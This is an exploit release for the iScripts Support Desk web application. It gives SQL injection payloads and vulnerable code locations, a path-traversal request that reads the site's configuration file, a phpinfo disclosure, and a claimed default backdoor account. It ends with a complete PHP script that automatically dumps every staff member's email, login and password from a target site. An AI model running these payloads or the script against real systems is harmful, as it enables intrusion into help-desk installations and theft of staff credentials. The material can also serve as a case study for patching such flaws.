Normal Sql postticketbeforeregistersave.php Staff table post : txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from `information_schema`.tables where table_schema=database() limit 33,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN Get staff Post : txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,unhex(Hex(cast(sptbl_staffs.vMail as char))),0x5e,unhex(Hex(cast(sptbl_staffs.vLogin as char))),0x5e,unhex(Hex(cast(sptbl_staffs.vPassword as char))),0x27,0x7e) from sptbl_staffs limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN > Blind /onlinetest.php $comp = $_GET["comp"]; include("./config/settings.php"); include("./includes/functions/dbfunctions.php"); $conn = getConnection(); $sql_img = "select vChatIcon from sptbl_companies where nCompId='".$comp."'"; $res_img = executeSelect($sql_img,$conn); if ( mysql_num_rows($res_img) > 0 ) { Exploit : /onlinetest.php?id=1 /client_prechat.php Line 3 : if ($_POST["comp"] !='' ) $comp = $_POST["comp"]; Line 245 : $sql_dpt = "SELECT d.nDeptId, d.vDeptDesc FROM sptbl_depts d INNER JOIN sptbl_companies c ON ( d.nCompId = c.nCompId ) WHERE d.nCompId = '".$comp."' ORDER BY d.vDeptDesc"; $res_dpt = executeSelect($sql_dpt,$conn); Exploit as : site.com/supportdesk/client_prechat.php Post parameter : comp=%inject_here% /getChatIcon_det.php Line 2 : $comp = $_GET["comp"]; Line 39 : $sql = "select s.nStaffId from sptbl_staffs s inner join sptbl_staffdept sd on ( s.nStaffId = sd.nStaffId ) inner join sptbl_depts d on ( sd.nDeptId = d.nDeptId ) where s.vOnline='1' and s.vDelStatus='0' and d.nCompId='".$comp."'"; $result = executeSelect($sql,$conn); if ( mysql_num_rows($result) > 0 ) { $img_src = "images/chat/chat-icon-".$img_id."-online.gif"; } else { $img_src = "images/chat/chat-icon-".$img_id."-offline.gif"; } Exploit as : site.com/supportdesk/getChatIcon_det.php?comp=1 /getChatUpdates.php if ( $_SESSION['sess_userid'] == "" ) echo "##X"; //So to Exploit it u should be logged in as normal user else { $mod = isset( $_GET['mod']) ? $_GET['mod'] : '' ; $chatid = isset( $_GET['chatid']) ? $_GET['chatid'] : '' ; $conn = getConnection(); $sql = "Select tMatter from sptbl_chat where nChatId='".$chatid."'"; $result = executeSelect($sql,$conn); $rowcnt_chatUpd = mysql_num_rows($result); Exploit : Login then Inject here > site.com/supportdesk/getChatUpdates.php?comp=1 You'd better use ur session id at havij for injection II.Local File Disclosure admin/csvdownload.php $filename="../csvfiles/".addslashes($_GET["id"]); header('Content-Description: File Transfer'); header('Content-Type: application/force-download'); header('Content-Length: ' . filesize($filename)); header('Content-Disposition: attachment; filename=' . basename($filename)); readfile($filename); Exploit as : admin/csvdownload.php?id=../config/settings.php III.PHP Info disclosure /phpinfo.php IV.Back Door user don't know if the nulled version only is backdoored or all versions but backdoor staff member is installed as user : staff pass : staff */ if(!$argv[1]) { echo "\n[+] usage : php ".$argv[0]." [Target]\nex : php ".$argv[0]." http://site.com/support/\n"; exit(); } echo "[+] iScripts Support Desk Sql Injection Exploit \n"; echo "[-] Exploited By i-Hmx \n"; echo "[-] sec4ever.com , 1337s.cc\n"; function kastr($string, $start, $end){ $string = " ".$string; $ini = strpos($string,$start); if ($ini == 0) return ""; $ini += strlen($start); $len = strpos($string,$end,$ini) - $ini; return substr($string,$ini,$len); } function faexploit($url,$inj){ $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$url."postticketbeforeregistersave.php"); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0); curl_setopt($curl, CURLOPT_POSTFIELDS,$inj); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } $version=faexploit($argv[1],"txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select concat(0x66617273617779,0x3e3e,unhex(Hex(cast(version() as char))),0x3c3c)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN"); if(preg_match("/farsawy/",$version)) { $ver=kastr($version,">>","<<"); echo "[-] Mysql Version : $ver\n"; $tbl=faexploit($argv[1],"txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select distinct concat(0x3e3e,unhex(Hex(cast(table_name as char))),0x3c3c) from `information_schema`.tables where table_schema=database() limit 33,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN"); $stf=kastr($tbl,">>","<<"); echo "[-] Staffs table name : $stf\n"; $numb=faexploit($argv[1],"txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select concat(0x3e3e,count(*),0x3c3c) from sptbl_staffs)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN"); $num=kastr($numb,">>","<<"); echo "[-] Number of staff members : $num\n"; echo "[-] Staffs data ordered as : Email : Username: Password\n"; for($f=0;$f<$num;$f++) { $data=faexploit($argv[1],"txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select concat(0x3e3e,unhex(Hex(cast(vMail as char))),0x3a,unhex(Hex(cast(vLogin as char))),0x3a,unhex(Hex(cast(vPassword as char))),0x3c3c) from $stf limit $f,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN"); $ok=kastr($data,">>","<<"); echo " $ok\n"; } echo "[+] Done\n"; exit(" Greets From Faris ;)"); } else { echo "[-] Target Not vulnerable\n"; echo "[+] Exit\n"; exit(); } // 07/2011 // i-Hmx ?>